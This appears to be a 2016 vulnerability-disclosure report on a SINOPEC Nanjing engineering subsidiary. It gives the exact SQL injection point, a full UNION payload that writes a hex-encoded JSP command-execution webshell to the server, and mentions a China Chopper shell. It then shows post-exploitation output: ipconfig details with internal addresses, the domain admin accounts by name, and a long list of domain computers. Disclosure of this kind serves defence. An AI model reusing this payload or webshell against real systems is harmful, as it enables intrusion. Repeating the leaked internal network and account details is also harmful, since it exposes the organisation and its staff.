中国石化某直属单位某系统SQL注入/getshell/域网几千台主机沦陷

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-08: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

rt

详细说明:

中石化南京工程有限公司(SINOPEC NANJING ENGINEERING &CONSTRUCTION INCORPORATION,简称SNEI)是中石化炼化工程(集团)股份有限公司直属企业。是以设计为先导,专利、专有技术、工艺包开发为核心,工程总承包和项目管理、专业施工为主体、面向国内外市场提供技术和管理服务的综合性、一体化的国际工程公司。



主页:http://www.snei.com.cn/



问题站点:http://v2.snei.com.cn/



注入点:http://v2.snei.com.cn//Conf/jsp/systembulletin/bulletinAction.dooperator=details



post



sysid=-1 union 注入



利用该注入直接写入shell



ysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23



上个菜刀马 index_cd.jsp



63.png





看下是不是在域里

code 区域
C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> ipconfig /all

Windows IP 配置

主机名 . . . . . . . . . . . . . : v2svr1
主 DNS 后缀 . . . . . . . . . . . : snei.com.cn
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : snei.com.cn

以太网适配器 本地连接 4:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-D0
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接 3:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CF
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接 2:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . : snei.com.cn
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CD
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是

以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CE
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::296e:f2cc:6642:2235%11(首选)
IPv4 地址 . . . . . . . . . . . . : 10.150.1.48(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.150.1.250
DHCPv6 IAID . . . . . . . . . . . : 248819282
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1E-AA-0F-DD-D4-AE-52-9D-E3-CE
DNS 服务器 . . . . . . . . . . . : 10.150.1.30
TCPIP 上的 NetBIOS . . . . . . . : 已启用

隧道适配器 isatap.{18F0418B-44BA-4EB7-BD31-A8BF6B32DD99}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{07D98EBF-A6F2-46EC-9899-12F2CEA8CB4A}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.snei.com.cn:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{D56D1E3E-BAA0-49D7-8060-AC6FE8375B0E}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是

隧道适配器 Teredo Tunneling Pseudo-Interface:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是





domain:snei.com.cn



看下域管理员组



code 区域
C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain admins" /domain
这项请求将在域 snei.com.cn 的域控制器处理。

组名 Domain Admins
注释 指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator chujing dnsmgmt
fsvr gcxmdns huangjk
NJGC-VMM-Admin snei-jm snei-virtual
snei-xxgl01 wangjian07 zhust
命令成功完成。





域内主机2000多台



code 区域
C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain computers" /domain
这项请求将在域 snei.com.cn 的域控制器处理。

组名 Domain Computers
注释 加入到域中的所有工作站和服务器

成员

-------------------------------------------------------------------------------
20110613-1620$ 360FBDSVR$ 5M5VYOP5317FUJA$
ADMIN-PC$ AP9QKUVLTJJSLBB$ APP$
APP-V1$ APPV2$ APPV3$
APPV4$ APPV5$ AZGCFGS002$
AZGCFGS218$ BAOWEICHU-YHM$ BESSER-LH-NJGC$
BHDELLWKS1$ BHDELLWKS2$ BHDELLWKS3$
BHDELLWKS333$ BHPDSSVR$ BIAIMIN-NB$
BIANDONG-NB$ BJ-1-002$ BLACKWKS0082$
BWC-YHM$ CAIRUICHENG-NB$ CAIZR-NB$
CGGCFGS011$ CGGCFGS018$ CGGCFGS021$
CGGCFGS025$ CGGCFGS029$ CGGCFGS033$
CGGCFGS034-NB$ CGGCFGS040$ CGGCFGS042$
CGGCFGS044$ CGGCFGS045$ CGGCFGS048$
CGGCFGS053$ CGGCFGS055$ CGGCFGS059$
CGGCFGS061$ CGGCFGS066$ CGGCFGS081$
CGGCFGS085$ CGGCFGS086$ CGGCFGS090$
CGGCFGS094$ CGGCFGS095$ CGGCFGS105$
CGGCFGS112$ CGGCFGS113$ CGGCFGS114$
CGGCFGS115$ CGGCFGS116$ CGGCFGS120$
CGGCFGS121$ CGGCFGS300$ CGGCFGS301-NB$
CGGCFGS303$ CGGCFGS304$ CGGCFGS305$
CGGCFGS306$ CGGCFGS307$ CGGCFGS308$
CGGCFGS309$ CGGCFGS310$ CGGCFGS311$
CGGCFGS312$ CGGCFGS313$ CGGCFGS314$
CGGCFGS315$ CGGSFGS099$ CHENJUNLS$
CHENRB-NB$ COMOS1$ COMOSSVR1$
CYGCFGS-YUANQIO$ DATABASE$ DCGCFGS354$
DELL-0185$ DELLWKS000$ DELLWKS0118$
DELLWKS0119$ DELLWKS0121$ DELLWKS0129$
DELLWKS0133$ DELLWKS0134$ DELLWKS0135$
DELLWKS0137$ DELLWKS0138$ DELLWKS0143$
DELLWKS0149$ DELLWKS0156$ DELLWKS0159$
DELLWKS0161$ DELLWKS0163$ DELLWKS0165$
DELLWKS0170$ DELLWKS0171$ DELLWKS0172$
DELLWKS0175$ DELLWKS0176$ DELLWKS0179$
DELLWKS0182$ DELLWKS0187$ DELLWKS0194$
DELLWKS0195$ DELLWKS0198$ DELLWKS0202$
DELLWKS0204$ DELLWKS0207$ DELLWKS0209$
DELLWKS0210$ DELLWKS0212$ DELLWKS0213$
DELLWKS0214$ DELLWKS0225$ DELLWKS0228$
DELLWKS0230$ DELLWKS0237$ DELLWKS0237-ZHS$
DELLWKS0246$ DELLWKS0247$ DELLWKS0252$
DELLWKS0253$ DELLWKS0255$ DELLWKS0256$
DELLWKS0257$ DELLWKS0259$ DELLWKS0260$
DELLWKS0261$ DELLWKS0263$ DELLWKS0265$
DELLWKS0266$ DELLWKS0267$ DELLWKS0268$
DELLWKS0269$ DELLWKS0277$ DELLWKS0278$
DELLWKS0279$ DELLWKS0282$ DELLWKS120$
DELLWKS133$ DELLWKS135$ DELLWKS140$
DELLWKS143$ DELLWKS145$ DELLWKS146$
DELLWKS147$ DELLWKS148$ DELLWKS149$
DELLWKS152$ DELLWKS153$ DELLWKS154$
DELLWKS155$ DELLWKS156$ DELLWKS157$
DELLWKS158$ DELLWKS160$ DELLWKS161$
DELLWKS162$ DELLWKS163$ DELLWKS164$
DELLWKS165$ DELLWKS167$ DELLWKS168$
DELLWKS198$ DELLWKS20200$ DELLWKS20201$
DELLWKS20202$ DELLWKS20203$ DELLWKS20204$
DELLWKS20205$ DELLWKS20206$ DELLWKS20207$
DELLWKS20208$ DELLWKS20209$ DELLWKS20210$
DELLWKS346$ DELLWKS-NDA0197$ DEVELOP1$
DEVELOP2$ DINGSK$ DUJIE-NBLS$
DYCFGS168$ DYGCFGS002$ DYGCFGS003$
DYGCFGS004$ DYGCFGS005$ DYGCFGS006$
DYGCFGS007$ DYGCFGS008$ DYGCFGS010$
DYGCFGS011$ DYGCFGS013$ DYGCFGS014$
DYGCFGS015$ DYGCFGS016$ DYGCFGS017$
DYGCFGS019$ DYGCFGS020$ DYGCFGS021$
DYGCFGS022$ DYGCFGS025$ DYGCFGS027$
DYGCFGS028$ DYGCFGS029$ DYGCFGS030$
DYGCFGS032$ DYGCFGS033$ DYGCFGS034$
DYGCFGS036$ DYGCFGS037$ DYGCFGS038$
DYGCFGS067$ DYGCFGS093$ DYGCFGS095-NBLS$
DYGCFGS124$ DYGCFGS132-NBLS$ DYGCFGS136$
DYGCFGS137$ DYGCFGS141$ DYGCFGS155$
DYGCFGS166$ DYGCFGS168$ DYGCFGS300$
DYGCFGS301$ DYGCFGS302$ DYGCFGS303$
DYGCFGS304$ DYGCFGS305$ DYGCFGS306$
DYGCFGS307$ DYGCFGS350$ DYGCFGS351$
DYGCFGS352$ DYGCFGS353$ DYGCFGS354$
DYGCFGS355$ DYGCFGS356$ DYGCFGS357$
DYGCFGS358$ DYGCFGS359$ DYGCFGS360$
DYGCFGS361$ EDMSADTS$ EDMSCS$
EDMSIDX$ ETHER2008$ FAS2240-1$
FAS2240-2$ FDSVR01$ FILESHARESVR1$
GAOYONGGANG-NB$ GCXMGLFGS001$ GCXMGLFGS002$
GCXMGLFGS003$ GCXMGLFGS004$ GCXMGLFGS005$
GCXMGLFGS007$ GCXMGLFGS008$ GCXMGLFGS009$
GCXMGLFGS011$ GCXMGLFGS013$ GCXMGLFGS014$
GCXMGLFGS017$ GCXMGLFGS023$ GCXMGLFGS024$
GCXMGLFGS025$ GCXMGLFGS026-01$ GCXMGLFGS027$
GCXMGLFGS027-1$ GCXMGLFGS028$ GCXMGLFGS029$
GCXMGLFGS030$ GCXMGLFGS031$ GCXMGLFGS032$
GCXMGLFGS033$ GCXMGLFGS100$ GDCGFGS017$
GDGCFGS001$ GDGCFGS002$ GDGCFGS003$
GDGCFGS006$ GDGCFGS007$ GDGCFGS008$
GDGCFGS009$ GDGCFGS010$ GDGCFGS011$
GDGCFGS012$ GDGCFGS013$ GDGCFGS014$
GDGCFGS015$ GDGCFGS016$ GDGCFGS017$
GDGCFGS018$ GDGCFGS019$ GDGCFGS020$
GDGCFGS023$ GDGCFGS026$ GDGCFGS027$
GDGCFGS028$ GDGCFGS029$ GDGCFGS030$
GDGCFGS031$ GDGCFGS032$ GDGCFGS033$
GDGCFGS036$ GDGCFGS039$ GDGCFGS043$
GDGCFGS051$ GDGCFGS054$ GDGCFGS063$
GDGCFGS064$ GDGCFGS066$ GDGCFGS067$
GDGCFGS070$ GDGCFGS090$ GDGCFGS093$
GDGCFGS123$ GDGCFGS124$ GDGCFGS125$
GDGCFGS300$ GDGCFGS301$ GDGCFGS302$
GDGCFGS303$ GDGCFGS304$ GDGCFGS305$
GDGCFGS306$ GDGCFGS307$ GDGCFGS308$
GDGCFGS309$ GDGCFGS310$ GDGCFGS311$
GDGCFGS312$ GDGCFGS313$ GDGCFGS314$
GDGCFGS315$ GDGCFGS350$ GDWKS01$
GDWKS02$ GENERAL-PRINT$ GLGY$
H28-SUNXIAORONG$ H29-ZHANGHONG01$ HANGUANG-NB$
HE47-GEHUA$ HE47-LIULAN$ HEJIANHUA-7$
HEJIANHUALS$ HERONGQUAN-NB$ HESHAN-NBLS$
HG06-052$ HJK000$ HJK0001$
HJK0002$ HJK003$ HJK-VMM$
HOUQB-NBLS$ HOUXB-NBLS$ HP25-056$
HQ00-001$ HQ00-002$ HQ00-003$
HQ00-004$ HQ00-005$ HQ00-007$
HQ00-008$ HQ00-009$ HQ00-010$
HQ00-012$ HQ00-013$ HQ00-015$
HQ00-016$ HQ00-017$ HQ00-018$
HQ00-020$ HQ00-021$ HQ00-022$
HQ00-023$ HQ00-024$ HQ00-025$
HQ00-026$ HQ00-027$ HQ00-028$
HQ00-030$ HQ00-033$ HQ00-035$
HQ00-036$ HQ00-042$ HQ00-043$
HQ00-046$ HQ00-047$ HQ00-048$
HQ00-049$ HQ00-050$ HQ00-051$
HQ00-052$ HQ00-053$ HQ00-054$
HQ00-055$ HQ00-055NB$ HQ00-056$
HQ00-057$ HQ00-058$ HQ-002-NB$
HQ00-50$ HQ00-BIHUA$ HQ00-DAISL$
HQ00-SHIFY$ HQ00-ZHOUYG$ HQ00-ZHUNQ$
HQ01-001$ HQ01-002$ HQ01-003$
HQ01-004$ HQ01-005$ HQ01-006$
HQ01-007$ HQ01-008$ HQ01-009$
HQ01-010$ HQ02-001$ HQ02-001-NB01$
HQ02-001-NB02$ HQ02-002$ HQ02-002NB$
HQ02-003$ HQ02-004$ HQ02-004-01$
HQ02-005$ HQ02-006$ HQ02-007$
HQ02-008$ HQ02-009$ HQ02-009VM$
HQ02-010$ HQ02-012$ HQ02-013$
HQ02-014$ HQ02-015$ HQ02-018$
HQ02-019$ HQ02-021$ HQ02-021LS$
HQ02-023$ HQ02-025$ HQ02-026$
HQ02-028$ HQ02-029$ HQ02-030$
HQ02-031$ HQ02-032$ HQ02-033$
HQ02-034$ HQ02-035$ HQ02-036$
HQ02-037$ HQ02-038$ HQ02-039$
HQ02-040$ HQ02-041$ HQ02-042$
HQ02-043$ HQ02-044NB$ HQ02-045NB$
HQ02-046$ HQ02-047$ HQ02-048$
HQ02-049$ HQ02-050$ HQ02-051$
HQ02-053$ HQ02-054$ HQ02-057$
HQ02-058$ HQ02-059$ HQ02-060$
HQ02-065$ HQ02-067$ HQ02-068$
HQ02-069$ HQ02-LIGANG01$ HQ02-LIUJX$
HQ02-ZHOUXW$ HQ03-001$ HQ03-001-NB$
HQ03-002$ HQ03-003$ HQ03-004$
HQ03-005$ HQ03-006$ HQ03-007$
HQ03-008$ HQ03-009$ HQ03-011$
HQ03-012$ HQ03-013$ HQ03-014$
HQ03-015$ HQ03-016$ HQ03-017$
HQ03-018$ HQ03-020$ HQ03-021$
HQ03-022$ HQ03-023$ HQ03-023NBLS$
HQ03-024$ HQ03-025$ HQ03-026$
HQ03-027$ HQ03-028$ HQ03-12$
HQ03-ZHOUXF$ HQ04-001$ HQ04-002$
HQ04-003$ HQ04-004$ HQ04-004-1$
HQ04-005$ HQ04-006$ HQ04-007$
HQ04-008$ HQ04-009$ HQ04-010$
HQ04-011$ HQ04-015$ HQ04-QURR1$
HQ05-001$ HQ05-002$ HQ05-003$
HQ05-004$ HQ05-005$ HQ05-006$
HQ05-MAOHF$ HQ06-001$ HQ06-001NB$
HQ06-003$ HQ06-004$ HQ06-005$
HQ06-006$ HQ06-007$ HQ06-007YHM$
HQ06-008$ HQ06-009$ HQ06-010$
HQ06-011$ HQ06-012$ HQ06-013$
HQ06-014$ HQ06-015NB$ HQ06-016$
HQ06-017$ HQ06-018$ HQ06-019$
HQ06-020$ HQ06-0201$ HQ06-020-OLD$
HQ06-021$ HQ06-022$ HQ06-023$
HQ06-024$ HQ06-028$ HQ06-029$
HQ06-029NB$ HQ06-030$ HQ06-031$
HQ06-032$ HQ06-033$ HQ06-034$
HQ06-034NB$ HQ06-038$ HQ06-039$
HQ06-040$ HQ06-041$ HQ06-042$
HQ06-043$ HQ06-044$ HQ06-045$
HQ06-046$ HQ06-047$ HQ06-048$
HQ06-050$ HQ06-051$ HQ06-052$
HQ06-053$ HQ06-054$ HQ06-055$
HQ06-056$ HQ06-057$ HQ06-058$
HQ06-060$ HQ06-062$ HQ06-064$
HQ06-065$ HQ06-067$ HQ06-068$
HQ06-069$ HQ06-071$ HQ06-072$
HQ06-099$ HQ06-100$ HQ06-16$
HQ06-240$ HQ06-42$ HQ06-59$
HQ06-CHUJING$ HQ06-LIUWLONG$ HQ06-LIXIN$
HQ06-SIYU$ HQ06-TANGZYAN$ HQ06-YAOXIN$
HQ06-YHM01$ HQ06-YHM02$ HQ06-ZHANGXIA$
HQ06-ZHAOHL$ HQ06-ZHUANGPING$ HQ06-ZHUST$
HQ07-002$ HQ07-003$ HQ07-004$
HQ07-005$ HQ07-009$ HQ07-020$
HQ07-045$ HQ07-CAIHM$ HQ08-001$
HQ08-002$ HQ08-003$ HQ08-004$
HQ08-005$ HQ08-006$ HQ08-007$
HQ08-008$ HQ08-LIUXL$ HQ09-001$
HQ09-006$ HQ09-009$ HQ09-020$
HQ09-HUBB$ HQ10-002$ HQ10-002BN$
HQ10-003$ HQ10-005$ HQ10-006$
HQ10-007$ HQ10-008$ HQ10-010$
HQ10-011$ HQ10-014$ HQ10-015$
HQ10-016$ HQ10-017$ HQ10-018$
HQ10-019$ HQ10-019NB$ HQ10-020$
HQ10-021$ HQ10-023$ HQ10-023NBLS$
HQ10-024$ HQ10-025$ HQ10-026$
HQ10-027$ HQ10-028$ HQ10-030$
HQ10-KANGSZ$ HQ10-PANHXIN$ HQ10-SHIHY$
HQ10-XIEZQ$ HQ10-YANJIE$ HQ11-002$
HQ11-003$ HQ11-008$ HQ11-009$
HQ11-010$ HQ11-011$ HQ11-012$
HQ11-013$ HQ11-014$ HQ11-016$
HQ11-016NB$ HQ11-019$ HQ11-019NB$
HQ11-020$ HQ11-021$ HQ11-023$
HQ11-024$ HQ11-025$ HQ11-026$
HQ11-027$ HQ11-028$ HQ11-029$
HQ11-030$ HQ11-031$ HQ11-032$
HQ11-033$ HQ11-05$ HQ11-17$
HQ11-18$ HQ11-FANGBIN$ HQ11-LIUYJZ$
HQ11-YUSM$ HQ12-001$ HQ12-005$
HQ12-009$ HQ12-011$ HQ12-012$
HQ12-012NBLS$ HQ12-013$ HQ12-014$
HQ12-015$ HQ12-017$ HQ12-018$
HQ12-019$ HQ12-020$ HQ12-021$
HQ12-022$ HQ12-CHENCM$ HQ12-LIUCHAO$
HQ12-TIANYING$ HQ13-001$ HQ13-001NB$
HQ13-002$ HQ13-003$ HQ13-004$
HQ13-005$ HQ13-006$ HQ13-007$
HQ13-008$ HQ13-009$ HQ13-010$
HQ13-011$ HQ13-013$ HQ13-014$
HQ13-015$ HQ13-016$ HQ13-017$
HQ13-018$ HQ13-019$ HQ13-020$
HQ13-021$ HQ13-023$ HQ13-024$
HQ13-025$ HQ13-026$ HQ13-027$
HQ13-028$ HQ13-030$ HQ13-031$
HQ13-032$ HQ13-033$ HQ13-035$
HQ13-036$ HQ13-037$ HQ13-040$
HQ13-042$ HQ13-043$ HQ13-044$
HQ13-045$ HQ13-046$ HQ13-047$
HQ13-048$ HQ13-049$ HQ13-050$
HQ13-051$ HQ13-052$ HQ13-053$
HQ13-054$ HQ13-055$ HQ13-056$
HQ13-057$ HQ13-058$ HQ13-059$
HQ13-060$ HQ13-061$ HQ13-062$
HQ13-099$ HQ13-SHENBM$ HQ13-SHISH$
HQ13-ZHOUMING$ HQ14-001$ HQ14-002$
HQ14-003$ HQ14-004$ HQ14-004NB$
HQ14-005$ HQ14-006$ HQ14-007$
HQ14-008$ HQ14-009$ HQ14-010$
HQ14-011$ HQ14-012$ HQ14-013$
HQ15-002$ HQ15-003$ HQ15-004$
HQ15-005$ HQ15-007$ HQ15-008$
HQ15-010$ HQ15-011$ HQ15-012$
HQ15-013$ HQ15-014$ HQ15-017$
HQ15-018$ HQ15-020$ HQ15-021$
HQ15-022$ HQ15-026$ HQ15-028$
HQ15-034$ HQ15-035$ HQ15-036$
HQ15-037$ HQ15-038$ HQ15-039$
HQ15-040$ HQ15-041$ HQ15-045$
HQ15-046$ HQ15-048$ HQ15-049$
HQ15-050$ HQ15-051$ HQ15-052$
HQ15-053$ HQ15-055$ HQ15-056$
HQ15-057$ HQ15-058$ HQ15-058NB$
HQ15-059$ HQ15-060$ HQ15-066$
HQ15-067$ HQ15-068$ HQ15-069$
HQ15-070$ HQ15-071$ HQ15-072$
HQ15-073$ HQ15-074$ HQ15-075$
HQ15-077$ HQ15-078$ HQ15-079$
HQ15-081$ HQ15-082$ HQ15-083$
HQ15-084-NB$ HQ15-085$ HQ15-086$
HQ15-087$ HQ15-090$ HQ15-091$
HQ15-092$ HQ15-1467923$ HQ15-BAOJIE$
HQ15-DAIZHAO$ HQ15-DTLS$ HQ15-DUJIE$
HQ15-LIUHS$ HQ15-LIUJUN$ HQ15-SUNXF$
HQ15-WANGJB$ HQ15-YUXB$ HQ16-001$
HQ16-002$ HQ16-003$ HQ16-004$
HQ16-006$ HQ16-007$ HQ16-008$
HQ16-009$ HQ16-010$ HQ16-011$
HQ16-012$ HQ16-014$ HQ16-015$
HQ16-016$ HQ16-017$ HQ16-018$
HQ16-019$ HQ16-020$ HQ16-021$
HQ16-023$ HQ16-024$ HQ16-025$
HQ16-026$ HQ16-100$ HQ16-HUANGHQ$
HQ16-LIANGZW$ HQ16-MAOHF$ HQ17-002$
HQ17-003$ HQ17-004$ HQ17-005$
HQ17-006$ HQ17-007$ HQ17-008$
HQ17-010$ HQ17-015$ HQ17-023$
HQ17-025$ HQ17-026NB$ HQ17-028$
HQ17-029$ HQ17-030$ HQ17-031$
HQ17-032$ HQ17-033$ HQ17-036$
HQ17-037$ HQ17-DONGNN$ HQ17-LIBJ$
HQ17-LIUCZ$ HQ17-LIYG$ HQ17-MAJIONG$
HQ18-001$ HQ18-002$ HQ18-002NB$
HQ18-004$ HQ18-005$ HQ18-006$
HQ18-008$ HQ18-009$ HQ18-014$
HQ18-015$ HQ18-016$ HQ18-017$
HQ18-018$ HQ18-019$ HQ18-021$
HQ18-022$ HQ18-023$ HQ18-JIANGCM$
HQ18-JIANGLI01$ HQ18-NIUXIAN$ HQ18-QIANLEI$
HQ18-YANGYL$ HQ18-YULH$ HQ18-ZHANGRH$
HQ19-001$ HQ19-002$ HQ19-003$
HQ19-004$ HQ19-005$ HQ19-006$
HQ19-007$ HQ19-008$ HQ19-010$
HQ19-011$ HQ19-013$ HQ19-014$
HQ19-015$ HQ19-016$ HQ19-018$
HQ19-019$ HQ19-GUYONG$ HQ19-LIUMD$
HQ19-ZHANGLXION$ HQ20-001$ HQ20-002NB$
HQ20-003$ HQ20-004$ HQ20-005$
HQ20-006$ HQ20-007$ HQ20-008$
HQ20-014$ HQ20-015$ HQ20-016$
HQ20-017$ HQ20-018$ HQ20-021$
HQ20-022$ HQ20-023$ HQ20-024$
HQ20-025$ HQ20-026$ HQ20-027$
HQ20-028$ HQ20-029$ HQ20-030$
HQ20-031$ HQ20-032$ HQ20-033$
HQ20-040$ HQ20-ZHANGJQ$ HQ21-001$
HQ21-002$ HQ21-003$ HQ21-004$
HQ21-005$ HQ21-006$ HQ21-01467868$
HQ21-101$ HQ21-102$ HQ21-103$
HQ21-LIUDY$ HQ21-YAOZG$ HQ22-001$
HQ22-002$ HQ22-003$ HQ22-004$
HQ22-005$ HQ22-008$ HQ22-009$
HQ22-010$ HQ23-001$ HQ23-002$
HQ23-003$ HQ23-004$ HQ23-005$
HQ23-006$ HQ23-007$ HQ24-002$
HQ24-003$ HQ24-004$ HQ24-009$
HQ24-010$ HQ24-011$ HQ24-012$
HQ24-013$ HQ24-015$ HQ24-016$
HQ24-017$ HQ24-022$ HQ24-024$
HQ24-025$ HQ24-026$ HQ24-028$
HQ24-029$ HQ24-030$ HQ24-033$
HQ24-035$ HQ24-036$ HQ24-039$
HQ24-040$ HQ24-042$ HQ24-044$
HQ24-045$ HQ24-046$ HQ24-047$
HQ24-048$ HQ24-049$ HQ24-052$
HQ24-056$ HQ24-058$ HQ24-059$
HQ24-061$ HQ24-062$ HQ24-063$
HQ24-065$ HQ24-066$ HQ24-067$
HQ24-068$ HQ24-070$ HQ24-072$
HQ24-073$ HQ24-074$ HQ24-075$
HQ24-076$ HQ24-077$ HQ24-078$
HQ24-079$ HQ24-081$ HQ24-082$
HQ24-084$ HQ24-085$ HQ24-086$
HQ24-087$ HQ24-090$ HQ24-091$
HQ24-093$ HQ24-094$ HQ24-095$
HQ24-096$ HQ24-097$ HQ24-098$
HQ24-099$ HQ24-100$ HQ24-101$
HQ24-102$ HQ24-103$ HQ24-104$
HQ24-105$ HQ24-106$ HQ24-109$
HQ24-110$ HQ24-112$ HQ24-113$
HQ24-114$ HQ24-115$ HQ24-116$
HQ24-117$ HQ24-118$ HQ24-119$
HQ24-120$ HQ24-121$ HQ24-122$
HQ24-124$ HQ24-125$ HQ24-126$
HQ24-127$ HQ24-128$ HQ24-129$
HQ24-130$ HQ24-131$ HQ24-133$
HQ24-134$ HQ24-135$ HQ24-136$
HQ24-137$ HQ24-138$ HQ24-139$
HQ24-140$ HQ24-141$ HQ24-142$
HQ24-143$ HQ24-144$ HQ24-145$
HQ24-146$ HQ24-147$ HQ24-148$
HQ24-150$ HQ24-151$ HQ24-152$
HQ24-153$ HQ24-177$ HQ24-189$
HQ24-190$ HQ24-82$ HQ24-GYSGY03$
HQ24-GYSGY04$ HQ24-JIANGGS$ HQ24-JIANGSJ$
HQ24-LINA01$ HQ24-LUZY$ HQ24-QIJW$
HQ24-SHIYONG$ HQ24-XUEBAI$ HQ24-YANJS$
HQ24-ZENGMING$ HQ24-ZHANGTING$ HQ24-ZHAOYC$
HQ25-001$ HQ25-002$ HQ25-002BJB$
HQ25-003$ HQ25-004$ HQ25-005$
HQ25-008$ HQ25-009$ HQ25-0101$
HQ25-013$ HQ25-014$ HQ25-01468010$
HQ25-015$ HQ25-016$ HQ25-017$
HQ25-0191$ HQ25-020$ HQ25-020V$
HQ25-021$ HQ25-022$ HQ25-023$
HQ25-024$ HQ25-025$ HQ25-026$
HQ25-026NB$ HQ25-028$ HQ25-029$
HQ25-030$ HQ25-031$ HQ25-032$
HQ25-033$ HQ25-035$ HQ25-037$
HQ25-038$ HQ25-039$ HQ25-040$
HQ25-041$ HQ25-043$ HQ25-044$
HQ25-045$ HQ25-046$ HQ25-047$
HQ25-050$ HQ25-051$ HQ25-052$
HQ25-053$ HQ25-054$ HQ25-057$
HQ25-058$ HQ25-059$ HQ25-061$
HQ25-062$ HQ25-063$ HQ25-064$
HQ25-065$ HQ25-066$ HQ25-067$
HQ25-068$ HQ25-069$ HQ25-070$
HQ25-071$ HQ25-072$ HQ25-074$
HQ25-075$ HQ25-076$ HQ25-077$
HQ25-078$ HQ25-079$ HQ25-080$
HQ25-081$ HQ25-082$ HQ25-083$
HQ25-084$ HQ25-085$ HQ25-086$
HQ25-087$ HQ25-088$ HQ25-089$
HQ25-090$ HQ25-091$ HQ25-092$
HQ25-093$ HQ25-094$ HQ25-095$
HQ25-098$ HQ25-099$ HQ25-101$
HQ25-102$ HQ25-103$ HQ25-GUANNH$
HQ25-ZHANGFQ$ HQ25-ZUOKZ$ HQ26-002$
HQ26-003$ HQ26-004$ HQ26-006$
HQ26-007$ HQ26-008$ HQ26-010$
HQ26-011$ HQ26-012$ HQ26-013$
HQ26-014$ HQ26-015$ HQ26-016$
HQ26-017$ HQ26-018$ HQ26-019$
HQ26-021$ HQ26-022$ HQ26-023$
HQ26-025$ HQ26-026$ HQ26-028$
HQ26-029$ HQ26-030$ HQ26-031$
HQ26-032$ HQ26-033$ HQ26-034$
HQ26-035$ HQ26-036$ HQ26-037$
